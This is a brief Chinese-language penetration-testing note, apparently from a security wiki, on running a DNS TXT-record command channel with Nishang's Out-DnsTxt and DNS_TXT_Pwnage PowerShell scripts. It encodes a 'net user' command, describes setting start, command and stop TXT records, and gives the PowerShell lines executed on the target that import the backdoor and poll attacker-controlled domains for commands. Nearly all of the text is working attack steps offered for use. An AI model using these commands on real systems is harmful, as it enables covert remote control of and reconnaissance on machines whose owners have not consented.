DNS TXT Command
https://github.com/samratashok/nishang/Utility/Out-DnsTxt.ps1
https://github.com/samratashok/nishang/Backdoors/DNS_TXT_Pwnage.ps1
新建一个psh文件,使用out-dnstxt转换,这里的命令是net user
y0stUSgtTi3i5QIA
添加一条域名txt记录,这里在本地设置,正常是在域名商的网站里配置
![](https://www.heresecurity.wiki/~gitbook/image?url=https%3A%2F%2Fraw.githubusercontent.com%2Fxiaoy-sec%2FPentest_Note%2Fmaster%2Fimg%2F203.png&width=768&dpr=4&quality=100&sign=2dafb386&sv=1)
还需创建两个txt记录,分别是指定开始和结束的字符串
靶机执行
>Import-Module .\DNS_TXT_Pwnage.ps1
>DNS_TXT_Pwnage -startdomain start.zone.com -cmdstring cmd -commanddomain 1.zone.com -psstring start -psdomain zone.com -Subdomains 1 -StopString stop
最后更新于